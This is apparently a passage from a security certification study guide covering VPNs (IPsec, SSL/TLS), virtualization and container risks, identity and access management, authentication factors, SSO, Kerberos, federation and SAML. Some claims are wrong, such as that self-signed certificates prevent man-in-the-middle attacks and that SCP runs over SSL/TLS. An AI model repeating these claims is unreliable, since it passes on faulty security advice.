In some instances, VLANs in a VPN solution may not be
supported by the ISP if they are also using VLANs in
their internal network. Choosing a provider that
provisions Multiprotocol Label Switching (MPLS)
connections can allow customers to establish VLANs to
other sites. MPLS provides VPN services with address
and routing separation between VPNs.
VPN connections can be used to provide remote access to
teleworkers or traveling users (called remote-access
VPNs) and can also be used to securely connect two
locations (called site-to-site VPNs). The implementation
process is conceptually different for these two VPN types.
In a remote-access VPN, the tunnel that is created has as
its endpoints the user’s computer and the VPN
concentrator. In this case, only traffic traveling from the
user computer to the VPN concentrator uses this tunnel.
In the case of two office locations, the tunnel endpoints
are the two VPN routers, one in each office. With this
configuration, all traffic that goes between the offices
uses the tunnel, regardless of the source or destination.
The endpoints are defined during the creation of the
VPN connection and thus must be set correctly according
to the type of remote-access link being used.
Two protocols commonly used to create VPN
connections are IPsec and SSL/TLS. The next section
discusses these two protocols
IPsec
Internet Protocol Security (IPsec) is a suite of protocols
used in various combinations to secure VPN connection.
Although it provides other services it is an encryption
protocol. Before we look at IPsec let’s look at several
remote-access or line protocols (tunneling protocols)
used to create VPN connections, including
• Point-to-Point Tunneling Protocol (PPTP):
PPTP is a Microsoft protocol based on PPP. It uses
built-in Microsoft Point-to-Point encryption and
can use a number of authentication methods,
including CHAP, MS-CHAP, and EAP-TLS. One
shortcoming of PPTP is that it only works on IPbased networks. If a WAN connection that is not
IP based is in use, L2TP must be used.
• Layer 2 Tunneling Protocol (L2TP): L2TP is
a newer protocol that operates at Layer 2 of the
OSI model. Like PPTP, L2TP can use various
authentication mechanisms; however, L2TP does
not provide any encryption. It is typically used
with IPsec, which is a very strong encryption
mechanism.
When using PPTP, the encryption is included, and the
only remaining choice to be made is the authentication
protocol. When using L2TP, both encryption and
authentication protocols, if desired, must be added.
IPsec can provide encryption, data integrity, and systembased authentication, which makes it a flexible and
capable option. By implementing certain parts of the
IPsec suite, you can either use these features or not.
Internet Protocol Security (IPsec) includes the
following components:
• Authentication Header (AH): AH provides
data integrity, data origin authentication, and
protection from replay attacks.
• Encapsulating Security Payload (ESP):
ESP provides all that AH does as well as data
confidentiality.
• Internet Security Association and Key
Management Protocol (ISAKMP): ISAKMP
handles the creation of a security association (SA)
for the session and the exchange of keys.
• Internet Key Exchange (IKEv2): Also
sometimes referred to as IPsec Key Exchange, IKE
provides the authentication material used to
create the keys exchanged by ISAKMP during peer
authentication. This was proposed to be
performed by a protocol called Oakley that relied
on the Diffie-Hellman algorithm, but Oakley has
been superseded by IKEv2.
IPsec is a framework, which means it does not specify
many of the components used with it. These components
must be identified in the configuration, and they must
match in order for the two ends to successfully create the
required SA that must be in place before any data is
transferred. The following selections must be made:
• The encryption algorithm, which encrypts the data
• The hashing algorithm, which ensures that the
data has not been altered and verifies its origin
• The mode, which is either tunnel or transport
• The protocol, which can be AH, ESP, or both
All these settings must match on both ends of the
connection. It is not possible for the systems to select
these on the fly. They must be preconfigured correctly in
order to match.
When configured in tunnel mode, the tunnel exists only
between the two gateways, but all traffic that passes
through the tunnel is protected. This is normally done to
protect all traffic between two offices. The SA is between
the gateways between the offices. This is the type of
connection that would be called a site-to-site VPN.
The SA between the two endpoints is made up of the
security parameter index (SPI) and the AH/ESP
combination. The SPI, a value contained in each IPsec
header, help the devices maintain the relationship
between each SA (and there could be several happening
at once) and the security parameters (also called the
transform set) used for each SA.
Each session has a unique session value, which helps
prevent
• Reverse engineering
• Content modification
• Factoring attacks (in which the attacker tries all
the combinations of numbers that can be used
with the algorithm to decrypt ciphertext)
With respect to authenticating the connection, the keys
can be preshared or derived from a public key
infrastructure (PKI). A PKI creates public/private key
pairs that are associated with individual users and
computers that use a certificate. These key pairs are used
in the place of preshared keys in that case. Certificates
that are not derived from a PKI can also be used.
In transport mode, the SA is either between two end
stations or between an end station and a gateway or
remote access server. In this mode, the tunnel extends
from computer to computer or from computer to
gateway. This is the type of connection that would be
used for a remote-access VPN. This is but one
application of IPsec.
When the communication is from gateway to gateway or
host to gateway, either transport or tunnel mode may be
used. If the communication is computer to computer,
transport mode is required. When using transport mode
from gateway to host, the gateway must operate as a
host.
The most effective attack against an IPsec VPN is a manin-the middle attack. In this attack, the attacker proceeds
through the security negotiation phase until the key
negotiation, when the victim reveals its identity. In a
well-implemented system, the attacker fails when the
attacker cannot likewise prove his identity.
SSL/TLS
Secure Sockets Layer (SSL)/Transport Layer
Security (TLS) is another option for creating VPNs.
Although SSL/TLS has largely been replaced by its
successor, TLS, it is quite common to hear it still refereed
to it as an SSL/TLS connection. It works at the
application layer of the OSI model and is used mainly to
protect HTTP traffic or web servers. Its functionality is
embedded in most browsers, and its use typically
requires no action on the part of the user. It is widely
used to secure Internet transactions. It can be
implemented in two ways:
• SSL/TLS portal VPN: In this case, a user has a
single SSL/TLS connection for accessing multiple
services on the web server. Once authenticated,
the user is provided a page that acts as a portal to
other services.
• SSL/TLS tunnel VPN: A user may use an
SSL/TLS tunnel to access services on a server that
is not a web server. This solution uses custom
programming to provide access to non-web
services through a web browser.
TLS and SSL/TLS are very similar but not the same.
When configuring SSL/TLS, a session key length must be
designated. The two options are 40-bit and 128-bit.
Using self-signed certificates to authenticate the server’s
public key prevents man-in-the-middle attacks.
SSL/TLS is often used to protect other protocols. Secure
Copy Protocol (SCP), for example, uses SSL/TLS to
secure file transfers between hosts. Table 8-2 lists some
of the advantages and disadvantages of SSL/TLS.
Table 8-2 Advantages and Disadvantages of
SSL/TLS
When placing the SSL/TLS gateway, you must consider a
trade-off: The closer the gateway is to the edge of the
network, the less encryption that needs to be performed
in the LAN (and the less performance degradation), but
the closer to the network edge it is placed, the farther the
traffic travels through the LAN in the clear. The decision
comes down to how much you trust your internal
network.
The latest version of TLS is version 1.3, which provides
access to advanced cipher suites that support elliptical
curve cryptography and AEAD block cipher modes. TLS
has been improved to support the following:
• Hash negotiation: Can negotiate any hash
algorithm to be used as a built-in feature, and the
default cipher pair MD5/SHA-1 has been replaced
with SHA-256.
• Certificate hash or signature control: Can
configure the certificate requester to accept only
specified hash or signature algorithm pairs in the
certification path.
• Suite B–compliant cipher suites: Two cipher
suites have been added so that the use of TLS can
be Suite B compliant:
•
TLS_ECDHE_ECDSA_WITH_AES_128_GC
M_SHA256
•
TLS_ECDHE_ECDSA_WITH_AES_256_GC
M_SHA384
Serverless
A serverless architecture is one in which servers are not
located where applications are hosted. In this model,
applications are hosted by a third-party service,
eliminating the need for server software and hardware
management by the developer. Applications are broken
up into individual functions that can be invoked and
scaled individually. Function as a Service (FaaS), another
name for serverless architecture, was discussed in
Chapter 6.
CHANGE MANAGEMENT
All networks evolve, grow, and change over time.
Companies and their processes also evolve and change,
which is a good thing. But infrastructure change must be
managed in a structured way so as to maintain a
common sense of purpose about the changes. By
following recommended steps in a formal change
management process, change can be prevented from
becoming the tail that wags the dog. The following are
guidelines to include as a part of any change
management policy:
• All changes should be formally requested.
• Each request should be analyzed to ensure it
supports all goals and polices.
• Prior to formal approval, all costs and effects of
the methods of implementation should be
reviewed.
• After they’re approved, the change steps should be
developed.
• During implementation, incremental testing
should occur, relying on a predetermined fallback
strategy if necessary.
• Complete documentation should be produced and
submitted with a formal report to management.
One of the key benefits of following this change
management method is the ability to make use of the
documentation in future planning. Lessons learned can
be applied, and even the process itself can be improved
through analysis.
VIRTUALIZATION
Multiple physical servers are increasingly being
consolidated to a single physical device or hosted as
virtual servers. It is even possible to have entire virtual
networks residing on these hosts. While it may seem that
these devices are safely contained on the physical
devices, they are still vulnerable to attack. If a host is
compromised or a hypervisor that manages virtualization
is compromised, an attack on the virtual machines (VMs)
could ensue.
Security Advantages and
Disadvantages of Virtualization
Virtualization of servers has become a key part of
reducing the physical footprint of data centers. The
advantages include
• Reduced overall use of power in the data center
• Dynamic allocation of memory and CPU resources
to the servers
• High availability provided by the ability to quickly
bring up a replica server in the event of loss of the
primary server
However, most of the same security issues that must be
mitigated in the physical environment must also be
addressed in the virtual network. In a virtual
environment, instances of an operating system are
virtual machines. A host system can contain many VMs.
Software called a hypervisor manages the distribution of
resources (CPU, memory, and disk) to the VMs. Figure
8-16 shows the relationship between the host machine,
its physical resources, the resident VMs, and the virtual
resources assigned to them.
Figure 8-16 Virtualization
Keep in mind that in any virtual environment, each
virtual server that is hosted on the physical server must
be configured with its own security mechanisms. These
mechanisms include antivirus and anti-malware
software and all the latest patches and security updates
for all the software hosted on the virtual machine. Also,
remember that all the virtual servers share the resources
of the physical device.
When virtualization is hosted on a Linux machine, any
sensitive application that must be installed on the host
should be installed in a chroot environment. A chroot on
Unix-based operating systems is an operation that
changes the root directory for the current running
process and its children. A program that is run in such a
modified environment cannot name (and therefore
normally cannot access) files outside the designated
directory tree.
Type 1 vs. Type 2 Hypervisors
The hypervisor that manages the distribution of the
physical server’s resources can be either Type 1 or Type
2:
• Type 1 hypervisor: A guest operating system
runs on another level above the hypervisor.
Examples of Type 1 hypervisors are Citrix
XenServer, Microsoft Hyper-V, and VMware
vSphere.
• Type 2 hypervisor: A Type 2 hypervisor runs
within a conventional operating system
environment. With the hypervisor layer as a
distinct second software level, guest operating
systems run at the third level above the hardware.
VMware Workstation and Oracle VM VirtualBox
exemplify Type 2 hypervisors.
Figure 8-17 shows a comparison of the two approaches.
Figure 8-17 Hypervisor Types
Virtualization Attacks and
Vulnerabilities
Virtualization attacks and vulnerabilities fall into the
following categories:
• VM escape: This type of attack occurs when a
guest OS escapes from its VM encapsulation to
interact directly with the hypervisor. This can
allow access to all VMs and the host machine as
well. Figure 8-18 illustrates an example of this
attack.
Figure 8-18 VM Escape
• Unsecured VM migration: This type of attack
occurs when a VM is migrated to a new host and
security policies and configuration are not
updated to reflect the change.
• Host and guest vulnerabilities: Host and
guest interactions can magnify system
vulnerabilities. The operating systems on both the
host and the guest systems can suffer the same
issues as those on all physical devices. For that
reason, both guest and host operating systems
should always have the latest security patches and
should have antivirus and anti-malware software
installed and up to date. All other principles of
hardening the operating system should also be
followed, including disabling unneeded services
and disabling unneeded accounts.
• VM sprawl: More VMs create more failure
points, and sprawl can cause problems even if no
malice is involved. Sprawl occurs when the
number of VMs grows over time to an
unmanageable number. As this occurs, the ability
of the administrator to keep up with them is
slowly diminished.
• Hypervisor attack: This type of attack involves
taking control of the hypervisor to gain access to
the VMs and their data. While these attacks are
rare due to the difficulty of directly accessing
hypervisors, administrators should plan for them.
• Data remnants: Sensitive data inadvertently
replicated in VMs as a result of cloud maintenance
functions or remnant data left in terminated VMs
needs to be protected. Also, if data is moved,
residual data may be left behind, accessible to
unauthorized users. Any remaining data in the old
location should be shredded, but depending on
the security practice, data remnants may remain.
This can be a concern with confidential data in
private clouds and any sensitive data in public
clouds. Commercial products can deal with data
remnants. For example, Blancco is a product that
permanently removes data from PCs, servers, data
center equipment, and smart phones. Data erased
by Blancco cannot be recovered with any existing
technology. Blancco also creates a report to price
each erasure for compliance purposes.
Virtual Networks
A virtual infrastructure usually contains virtual switches
that connect to the physical switches in the network. You
should ensure that traffic from the physical network to
the virtual network is tightly controlled. Remember that
virtual machines run operating systems that are
vulnerable to the same attacks as those on physical
machines. Also, the same type of network attacks and
scanning can be done if there is access to the virtual
network.
Management Interface
Some vulnerability exists in the management interface to
the hypervisor. The danger here is that this interface
typically provides access to the entire virtual
infrastructure. The following are some of the attacks
through this interface:
• Privilege elevation: In some cases, the dangers
of privilege elevation or escalation in a virtualized
environment may be equal to or greater than
those in a physical environment. When the
hypervisor is performing its duty of handling calls
between the guest operating system and the
hardware, any flaws introduced to those calls
could allow an attacker to escalate privileges in
the guest operating system. An example of a flaw
in VMware ESX Server, Workstation, Fusion, and
View products could have led to escalation on the
host. VMware reacted quickly to fix this flaw with
a security update. The key to preventing privilege
escalation is to make sure all virtualization
products have the latest updates and patches.
• Live VM migration: One of the advantages of a
virtualized environment is the ability of the
system to migrate a VM from one host to another
when needed, called a live migration. When VMs
are on the network between secured perimeters,
attackers can exploit the network vulnerability to
gain unauthorized access to VMs. With access to
the VM images, attackers can plant malicious code
in the VM images to plant attacks on data centers
that VMs travel between. Often the protocols used
for the migration are not encrypted, making a
man-in-the-middle attack in the VM possible
while it is in transit, as shown in Figure 8-19. They
key to preventing man-in-the middle attacks is
encryption of the images where they are stored.
Figure 8-19 Man-in-the-Middle Attack
Vulnerabilities Associated with a
Single Physical Server Hosting
Multiple Companies’ Virtual
Machines
In some virtualization deployments, a single physical
server hosts multiple organizations’ VMs. All the VMs
hosted on a single physical computer must share the
resources of that physical server. If the physical server
crashes or is compromised, all the organizations that
have VMs on that physical server are affected. User
access to the VMs should be properly configured,
managed, and audited. Appropriate security controls,
including antivirus, anti-malware, ACLs, and auditing,
must be implemented on each of the VMs to ensure that
each one is properly protected. Other risks to consider
include physical server resource depletion, network
resource performance, and traffic filtering between
virtual machines.
Driven mainly by cost, many companies outsource to
cloud providers computing jobs that require a large
number of processor cycles for a short duration. This
situation allows a company to avoid a large investment in
computing resources that will be used for only a short
time. Assuming that the provisioned resources are
dedicated to a single company, the main vulnerability
associated with on-demand provisioning is traces of
proprietary data that can remain on the virtual machine
and may be exploited.
Let’s look at an example. Say that a security architect is
seeking to outsource company server resources to a
commercial cloud service provider. The provider under
consideration has a reputation for poorly controlling
physical access to data centers and has been the victim of
social engineering attacks. The service provider regularly
assigns VMs from multiple clients to the same physical
resource. When conducting the final risk assessment, the
security architect should take into consideration the
likelihood that a malicious user will obtain proprietary
information by gaining local access to the hypervisor
platform.
Vulnerabilities Associated with a
Single Platform Hosting Multiple
Companies’ Virtual Machines
In some virtualization deployments, a single platform
hosts multiple organizations’ VMs. If all the servers that
host VMs use the same platform, attackers will find it
much easier to attack the other host servers once the
platform is discovered. For example, if all physical
servers use VMware to host VMs, any identified
vulnerabilities for that platform could be used on all host
computers. Other risks to consider include
misconfigured platforms, separation of duties, and
application of security policy to network interfaces. If an
administrator wants to virtualize the company’s web
servers, application servers, and database servers, the
following should be done to secure the virtual host
machines: only access hosts through a secure
management interface and restrict physical and network
access to the host console.
Virtual Desktop Infrastructure (VDI)
Virtual desktop infrastructure (VDI) hosts
desktop operating systems within a virtual environment
in a centralized server. Users access the desktops and run
them from the server. There are three models for
implementing VDI:
• Centralized model: All desktop instances are
stored in a single server, which requires
significant processing power on the server.
• Hosted model: Desktops are maintained by a
service provider. This model eliminates capital
cost and is instead considered operational cost.
• Remote virtual desktops model: An image is
copied to the local machine, which means a
constant network connection is unnecessary.
Figure 8-20 compares the remote virtual desktop models
(also called streaming) with centralized VDI.
Figure 8-20 VDI Streaming and Centralized VDI
Terminal Services/Application
Delivery Services
Just as operating systems can be provided on demand
with technologies like VDI, applications can also be
provided to users from a central location. Two models
can be used to implement this:
• Server-based application virtualization
(terminal services): In server-based
application virtualization, an application runs on
servers. Users receive the application
environment display through a remote client
protocol, such as Microsoft Remote Desktop
Protocol (RDP) or Citrix Independent Computing
Architecture (ICA). Examples of terminal services
include Remote Desktop Services and Citrix
Presentation Server.
• Client-based application virtualization
(application streaming): In client-based
application virtualization, the target application is
packaged and streamed to the client PC. It has its
own application computing environment that is
isolated from the client OS and other applications.
A representative example is Microsoft Application
Virtualization (App-V).
Figure 8-21 compares these two approaches.
Figure 8-21 Application Streaming and Terminal
Services
When using either of these technologies, you should
force the use of encryption, set limits to the connection
life, and strictly control access to the server. These
measures can prevent eavesdropping on any sensitive
information, especially the authentication process.
CONTAINERIZATION
A newer approach to server virtualization is referred to
as container-based virtualization, also called operating
system virtualization. Containerization is a technique
in which the kernel allows for multiple isolated user
space instances. The instances are known as containers,
virtual private servers, or virtual environments.
In this model, the hypervisor is replaced with operating
system–level virtualization. A virtual machine is not a
complete operating system instance but rather a partial
instance of the same operating system. The containers in
Figure 8-22 are the darker boxes just above the host OS
level. Container-based virtualization is used mostly in
Linux environments, and examples are the commercial
Parallels Virtuozzo and the open source OpenVZ project.
Figure 8-22 Container-based Virtualization
IDENTITY AND ACCESS
MANAGEMENT
This section describes how identity and access
management (IAM) work, why IAM is important, and
how IAM components and devices work together in an
enterprise. Access control allows only authorized users,
applications, devices, and systems to access enterprise
resources and information. In includes facilities, support
systems, information systems, network devices, and
personnel. Security practitioners must use access
controls to specify which users can access a resource,
which resources can be accessed, which operations can
be performed, and which actions will be monitored. Once
again, the CIA triad is important in providing enterprise
IAM. The three-step process used to set up a robust IAM
system is covered in the following sections.
Identify Resources
This first step in the access control process involves
defining all resources in the IT infrastructure by deciding
which entities need to be protected. When defining these
resources, you must also consider how the resources will
be accessed. The following questions can be used as a
starting point during resource identification:
• Will this information be accessed by members of
the general public?
• Should access to this information be restricted to
employees only?
• Should access to this information be restricted to a
smaller subset of employees?
Keep in mind that data, applications, services, servers,
and network devices are all considered resources.
Resources are any organizational asset that users can
access. In access control, resources are often referred to
as objects.
Identify Users
After identifying the resources, an organization should
identify the users who need access to the resources. A
typical security professional must manage multiple levels
of users who require access to organizational resources.
During this step, only identifying the users is important.
The level of access these users will be given will be
analyzed further in the next step.
As part of this step, you must analyze and understand the
users’ needs and then measure the validity of those needs
against organizational needs, policies, legal issues, data
sensitivity, and risk.
Remember that any access control strategy and the
system deployed to enforce it should avoid complexity.
The more complex an access control system is, the
harder that system is to manage. In addition,
anticipating security issues that could occur in more
complex systems is much harder. As security
professionals, we must balance the organization’s
security needs and policies with the needs of the users. If
a security mechanism that we implement causes too
much difficulty for the user, the user might engage in
practices that subvert the mechanisms that we
implement. For example, if you implement a password
policy that requires a very long, complex password, users
might find remembering their passwords to be difficult.
Users might then write their passwords on sticky notes
that they then attach to their monitor or keyboard.
Identify Relationships Between
Resources and Users
The final step in the access control process is to define
the access control levels that need to be in place for each
resource and the relationships between the resources
and users. For example, if an organization has defined a
web server as a resource, general employees might need
a less restrictive level of access to the resource than the
level given to the public and a more restrictive level of
access to the resource than the level given to the web
development staff. Access controls should be designed to
support the business functionality of the resources that
are being protected. Controlling the actions that can be
performed for a specific resource based on a user’s role is
vital.
Privilege Management
When users are given the ability to do something that
typically only an administrator can do, they have been
granted privileges and their account becomes a
privileged account. The management of such accounts is
called privilege management and must be conducted
carefully because any privileges granted become tools
that can be used against your organization if an account
is compromised by a malicious individual.
An example of the use of privilege management is in the
use of attribute certificates (ACs) to hold user privileges
with the same object that authenticates them. So when
Sally uses her certificates to authenticate, she receives
privileges that are attributes of the certificate. This
architecture is called a privilege management
infrastructure.
Multifactor Authentication (MFA)
Identifying users and devices and determining the
actions permitted by a user or device forms the
foundation of access control models. While this
paradigm has not changed since the beginning of
network computing, the methods used to perform this
important set of functions have changed greatly and
continue to evolve. While simple usernames and
passwords once served the function of access control, in
today’s world, more sophisticated and secure methods
are developing quickly. Not only are such simple systems
no longer secure, the design of access credential systems
today emphasizes ease of use. Multifactor
authentication (MFA) is the use of more than a single
factor, such as a password, to authenticate someone. This
section covers multifactor authentication.
Authentication
To be able to access a resource, a user must prove her
identity, provide the necessary credentials, and have the
appropriate rights to perform the tasks she is
completing. So there are two parts:
• Identification: In the first part of the process, a
user professes an identity to an access control
system.
• Authentication: The second part of the process
involves validating a user with a unique identifier
by providing the appropriate credentials.
When trying to differentiate between these two parts,
security professionals should know that identification
identifies the user, and authentication verifies that the
identity provided by the user is valid. Authentication is
usually implemented through a user password provided
at login. The login process should validate the login after
all the input data is supplied. The most popular forms of
user identification include user IDs or user accounts,
account numbers, and personal identification numbers
(PINs).
Authentication Factors
Once the user identification method has been
established, an organization must decide which
authentication method to use. Authentication methods
are divided into five broad categories:
• Knowledge factor authentication: Something
a person knows
• Ownership factor authentication: Something
a person has
• Characteristic factor authentication:
Something a person is
• Location factor authentication: Somewhere a
person is
• Action factor authentication: Something a
person does
Authentication usually ensures that a user provides at
least one factor from these categories, which is referred
to as single-factor authentication. An example of this
would be providing a username and password at login.
Two-factor authentication ensures that the user provides
two of the three factors. An example of two-factor
authentication would be providing a username,
password, and smart card at login. Three-factor
authentication ensures that a user provides three factors.
An example of three-factor authentication would be
providing a username, password, smart card, and
fingerprint at login. For authentication to be considered
strong authentication, a user must provide factors from
at least two different categories. (Note that the username
is the identification factor, not an authentication factor.)
You should understand that providing multiple
authentication factors from the same category is still
considered single-factor authentication. For example, if a
user provides a username, password, and the user’s
mother’s maiden name, single-factor authentication is
being used. In this example, the user is still only
providing factors that are something a person knows.
Knowledge Factors
As previously described in brief, knowledge factor
authentication is authentication that is provided
based on something a person knows. This type of
authentication is referred to as a Type I authentication
factor. While the most popular form of authentication
used by this category is password authentication, other
knowledge factors can be used, including date of birth,
mother’s maiden name, key combination, or PIN.
Ownership Factors
Ownership factor authentication is authentication
that is provided based on something that a person has.
This type of authentication is referred to as a Type II
authentication factor. Ownership factors can include the
following:
• Token devices: A token device is a handheld
device that presents the authentication server
with the one-time password. If the authentication
method requires a token device, the user must be
in physical possession of the device to
authenticate. So although the token device
provides a password to the authentication server,
the token device is considered a Type II
authentication factor because its use requires
ownership of the device. A token device is usually
implemented only in very secure environments
because of the cost of deploying the token device.
In addition, token-based solutions can experience
problems because of the battery life span of the
token device.
• Memory cards: A memory card is a swipe card
that is issued to a valid user. The card contains
user authentication information. When the card is
swiped through a card reader, the information
stored on the card is compared to the information
that the user enters. If the information matches,
the authentication server approves the login. If it
does not match, authentication is denied. Because
the card must be read by a card reader, each
computer or access device must have its own card
reader. In addition, the cards must be created and
programmed. Both of these steps add complexity
and cost to the authentication process. However,
using memory cards is often worth the extra
complexity and cost for the added security it
provides, which is a definite benefit of this system.
However, the data on the memory cards is not
protected, and this is a weakness that
organizations should consider before
implementing this type of system. Memory-only
cards are very easy to counterfeit.
• Smart cards: A smart card accepts, stores, and
sends data but can hold more data than a memory
card. Smart cards, often known as integrated
circuit cards (ICCs), contain memory like memory
cards but also contain embedded chips like bank
or credit cards. Smart cards use card readers.
However, the data on a smart card is used by the
authentication server without user input. To
protect against lost or stolen smart cards, most
implementations require the user to input a secret
PIN, meaning the user is actually providing both
Type I (PIN) and Type II (smart card)
authentication factors.
Characteristic Factors
Characteristic factor authentication is
authentication that is provided based on something a
person is. This type of authentication is referred to as a
Type III authentication factor. Biometric technology is
the technology that allows users to be authenticated
based on physiological or behavioral characteristics.
Physiological characteristics include any unique physical
attribute of the user, including iris, retina, and
fingerprints. Behavioral characteristics measure a
person’s actions in a situation, including voice patterns
and data entry characteristics.
Single Sign-On (SSO)
In an effort to make users more productive, several
solutions have been developed to allow users to use a
single password for all functions and to use these same
credentials to access resources in external organizations.
These concepts are called single sign-on (SSO) and
identity verification based on federations. The following
section looks at these concepts and their security issues.
In an SSO environment, a user enters his login
credentials once and can access all resources in the
network. The Open Group Security Forum has defined
many objectives for an SSO system. Some of the
objectives for the user sign-on interface and user account
management include the following:
• The interface should be independent of the type of
authentication information handled.
• The creation, deletion, and modification of user
accounts should be supported.
• Support should be provided for a user to establish
a default user profile.
• Accounts should be independent of any platform
or operating system.
Note
To obtain more information about the Open Group’s Single Sign-On Standard,
visit http://www.opengroup.org/security/sso_scope.htm.
SSO provides many advantages and disadvantages when
it is implemented.
Advantages of an SSO system include the following:
• Users are able to use stronger passwords.
• User and password administration is simplified.
• Resource access is much faster.
• User login is more efficient.
• Users only need to remember the login credentials
for only a single system.
Disadvantages of an SSO system include the following:
• After a user obtains system access through the
initial SSO login, the user is able to access all
resources to which he is granted access. Although
this is also an advantage for the user (only one
login needed), it is also considered a disadvantage
because only one sign-on by an adversary can
compromise all the systems that participate in the
SSO network.
• If a user’s credentials are compromised, attackers
will have access to all resources to which the user
has access.
Although the discussion of SSO so far has been mainly
about how it is used for networks and domains, SSO can
also be implemented in web-based systems. Enterprise
access management (EAM) provides access control
management for web-based enterprise systems. Its
functions include accommodation of a variety of
authentication methods and role-based access control.
SSO can be implemented in Kerberos, SESAME, and
federated identity management environments. Security
domains can then be established to assign SSO rights to
resources.
Kerberos
Kerberos is an authentication protocol that uses a
client/server model developed by MIT’s Project Athena.
It is the default authentication model in the recent
editions of Windows Server and is also used in Apple,
Oracle, and Linux operating systems.
Kerberos is an SSO system that uses symmetric key
cryptography. Kerberos provides confidentiality and
integrity. Kerberos assumes that messaging, cabling, and
client computers are not secure and are easily accessible.
In a Kerberos exchange involving a message with an
authenticator, the authenticator contains the client ID
and a timestamp. Because a Kerberos ticket is valid for a
certain time, the timestamp ensures the validity of the
request.
In a Kerberos environment, the key distribution center
(KDC) is the repository for all user and service secret
keys. The process of authentication and subsequent
access to resources is as follows:
1. The client sends a request to the authentication
server (AS), which might or might not be the KDC.
2. The AS forwards the client credentials to the KDC.
3. The KDC authenticates clients to other entities on a
network and facilitates communication using
session keys. The KDC provides security to clients
or principals, which are users, network services,
and software. Each principal must have an account
on the KDC.
4. The KDC issues a ticket-granting ticket (TGT) to the
principal.
5. The principal sends the TGT to the ticket-granting
service (TGS) when the principal needs to connect
to another entity.
6. The TGS then transmits a ticket and session keys to
the principal. The set of principles for which a
single KDC is responsible is referred to as a realm.
Some advantages of implementing Kerberos include the
following:
• User passwords do not need to be sent over the
network.
• Both the client and server authenticate each other.
• The tickets passed between the server and client
are timestamped and include lifetime
information.
• The Kerberos protocol uses open Internet
standards and is not limited to proprietary codes
or authentication mechanisms.
Some disadvantages of implementing Kerberos include
the following:
• KDC redundancy is required if providing fault
tolerance is a requirement. The KDC is a single
point of failure.
• The KDC must be scalable to ensure that
performance of the system does not degrade.
• Session keys on the client machines can be
compromised.
• Kerberos traffic needs to be encrypted to protect
the information over the network.
• All systems participating in the Kerberos process
must have synchronized clocks.
• Kerberos systems are susceptible to passwordguessing attacks.
Figure 8-23 show the Kerberos ticketing process.
Figure 8-23 Kerberos Ticket-Issuing Process
Active Directory
Microsoft’s implementation of SSO is Active Directory
(AD), which organizes directories into forests and trees.
AD tools are used to manage and organize everything in
an organization, including users and devices. This is
where security is implemented, and its implementation
is made more efficient through the use of Group Policy.
AD is an example of a system based on the Lightweight
Directory Access Protocol (LDAP). It uses the same
authentication and authorization system used in Unix
and Kerberos. This system authenticates a user once and
then, through the use of a ticket system, allows the user
to perform all actions and access all resources to which
she has been given permission without the need to
authenticate again. The steps in this process are shown
in Figure 8-24. The user authenticates with the domain
controller, which is performing several other roles as
well. First, it is the key distribution center (KDC), which
runs the authorization service (AS), which determines
whether the user has the right or permission to access a
remote service or resource in the network.
Figure 8-24 Kerberos Implementation in Active
Directory
After the user has been authenticated (when she logs on
once to the network), she is issued a ticket-granting
ticket (TGT). This is used to later request session tickets,
which are required to access resources. At any point that
she later attempts to access a service or resource, she is
redirected to the AS running on the KDC. Upon
presenting her TGT, she is issued a session, or service,
ticket for that resource. The user presents the service
ticket, which is signed by the KDC, to the resource server
for access. Because the resource server trusts the KDC,
the user is granted access.
SESAME
The Secure European System for Applications in
a Multivendor Environment (SESAME) project
extended Kerberos’s functionality to fix Kerberos’s
weaknesses. SESAME uses both symmetric and
asymmetric cryptography to protect interchanged data.
SESAME uses a trusted authentication server at each
host. SESAME uses Privileged Attribute Certificates
(PACs) instead of tickets. It incorporates two certificates:
one for authentication and one for defining access
privileges. The trusted authentication server is referred
to as the Privileged Attribute Server (PAS), which
performs roles similar to the KDC in Kerberos. SESAME
can be integrated into a Kerberos system.
Federation
A federated identity is a portable identity that can be
used across businesses and domains. In federated
identity management, each organization that joins the
federation agrees to enforce a common set of policies and
standards. These policies and standards define how to
provision and manage user identification,
authentication, and authorization. Providing disparate
authentication mechanisms with federated IDs has a
lower up-front development cost than other methods,
such as a PKI or attestation. Federated identity
management uses two basic models for linking
organizations within the federation:
• Cross-certification model: In this model, each
organization certifies that every other
organization is trusted. This trust is established
when the organizations review each other’s
standards. Each organization must verify and
certify through due diligence that the other
organizations meet or exceed standards. One
disadvantage of cross-certification is that the
number of trust relationships that must be
managed can become problematic.
• Trusted third-party (or bridge) model: In
this model, each organization subscribes to the
standards of a third party. The third party
manages verification, certification, and due
diligence for all organizations. This is usually the
best model for an organization that needs to
establish federated identity management
relationships with a large number of
organizations.
Security issues with federations and their possible
solutions include the following:
• Inconsistent security among partners:
Federated partners need to establish minimum
standards for the policies, mechanisms, and
practices they use to secure their environments
and information.
• Insufficient legal agreements among
partners: Like any other business partnership,
identity federation requires carefully drafted legal
agreements.
A number of methods are used to securely transmit
authentication data among partners. The following
sections look at these protocols and services.
XACML
Extensible Access Control Markup Language (XACML) is
a standard for an access control policy language using
XML. It is covered in Chapter 7, “Implementing Controls
to Mitigate Attacks and Software Vulnerabilities.”
SPML
Another open standard for exchanging authorization
information between cooperating organizations is
Service Provisioning Markup Language
(SPML). It is an XML-based framework developed by
the Organization for the Advancement of Structured
Information Standards (OASIS), which is a nonprofit,
international consortium that creates interoperable
industry specifications based on public standards such as
XML and SGML. The SPML architecture has three
components:
• Request authority (RA): The entity that makes
the provisioning request
• Provisioning service provider (PSP): The
entity that responds to the RA requests
• Provisioning service target (PST): The entity
that performs the provisioning
When a trust relationship has been established between
two organizations with web-based services, one
organization acts as the RA and the other acts as the PSP.
The trust relationship uses Security Assertion Markup
Language (SAML), discussed next, in a Simple Object
Access Protocol (SOAP) header. The SOAP body
transports the SPML requests/responses.
Figure 8-25 shows an example of how these SPML
messages are used. In the diagram, a company has an
agreement with a supplier to allow the supplier to access
its provisioning system. When the supplier’s HR
department adds a user, an SPML request is generated to
the supplier’s provisioning system so the new user can
use the system. Then the supplier’s provisioning system
generates another SPML request to create the account in
the customer provisioning system.
Figure 8-25 SPML
SAML
Security Assertion Markup Language (SAML) is
a security attestation model built on XML and SOAPbased services that allows for the exchange of
authentication and authorization data between systems
and supports federated identity management. The major
issue it attempts to address is SSO using a web browser.
When authenticating over HTTP using SAML, an
assertion ticket is issued to the authenticating user.
Remember that SSO enables a user to authenticate once
to access multiple sets of data. SSO at the Internet level
is usually accomplished with cookies, but extending the
concept beyond the Internet has resulted in many
proprietary approaches that are not interoperable. The
goal of SAML is to create a standard for this process.
